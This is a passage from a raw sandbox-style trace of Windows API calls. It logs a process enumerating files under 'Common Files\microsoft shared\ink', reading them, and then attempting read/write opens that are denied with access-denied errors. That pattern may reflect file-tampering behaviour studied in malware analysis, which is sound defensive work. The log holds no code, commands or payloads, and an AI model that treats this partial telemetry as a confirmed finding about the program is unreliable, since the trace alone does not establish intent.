lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0084.808] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.808] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.809] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.809] CloseHandle (hObject=0x364) returned 1 [0084.809] AreFileApisANSI () returned 1 [0084.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0084.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml") returned 62 [0084.809] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.809] GetLastError () returned 0x5 [0084.809] GetLastError () returned 0x5 [0084.809] SetLastError (dwErrCode=0x5) [0084.809] GetLastError () returned 0x5 [0084.809] SetLastError (dwErrCode=0x5) [0084.809] GetLastError () returned 0x5 [0084.809] SetLastError (dwErrCode=0x5) [0084.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0084.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.810] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xaa0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipstr.xml", cAlternateFileName="")) returned 1 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0084.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.810] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.810] AreFileApisANSI () returned 1 [0084.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml", lpUsedDefaultChar=0x0) returned 61 [0084.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0084.811] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.811] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.811] AreFileApisANSI () returned 1 [0084.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e608 [0084.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6e608, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml") returned 61 [0084.811] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.811] GetFileType (hFile=0x364) returned 0x1 [0084.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0084.811] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.811] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.812] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.812] CloseHandle (hObject=0x364) returned 1 [0084.812] AreFileApisANSI () returned 1 [0084.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e828 [0084.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6e828, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml") returned 61 [0084.812] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.812] GetLastError () returned 0x5 [0084.812] GetLastError () returned 0x5 [0084.812] SetLastError (dwErrCode=0x5) [0084.812] GetLastError () returned 0x5 [0084.812] SetLastError (dwErrCode=0x5) [0084.812] GetLastError () returned 0x5 [0084.812] SetLastError (dwErrCode=0x5) [0084.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0084.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0084.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.813] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0769b1e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0084.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0084.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0084.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0084.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0084.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0084.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.813] AreFileApisANSI () returned 1 [0084.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT", lpUsedDefaultChar=0x0) returned 57 [0084.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0084.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0084.814] AreFileApisANSI () returned 1 [0084.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0084.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a4b0 [0084.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT") returned 57 [0084.814] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.814] GetLastError () returned 0x5 [0084.814] GetLastError () returned 0x5 [0084.814] SetLastError (dwErrCode=0x5) [0084.814] GetLastError () returned 0x5 [0084.814] SetLastError (dwErrCode=0x5) [0084.814] GetLastError () returned 0x5 [0084.814] SetLastError (dwErrCode=0x5) [0084.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0084.814] AreFileApisANSI () returned 1 [0084.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0084.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0084.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT") returned 57 [0084.814] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.814] GetLastError () returned 0x5 [0084.814] GetLastError () returned 0x5 [0084.814] SetLastError (dwErrCode=0x5) [0084.814] GetLastError () returned 0x5 [0084.814] SetLastError (dwErrCode=0x5) [0084.814] GetLastError () returned 0x5 [0084.815] SetLastError (dwErrCode=0x5) [0084.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0084.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0084.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.815] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0084.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0084.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0084.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0084.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0084.815] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0084.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0084.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0084.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0084.815] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78c50 [0085.009] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0769b1e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.009] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9592f9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e9592f9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e9592f9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x80a30 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0085.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.011] AreFileApisANSI () returned 1 [0085.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d9a0 [0085.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 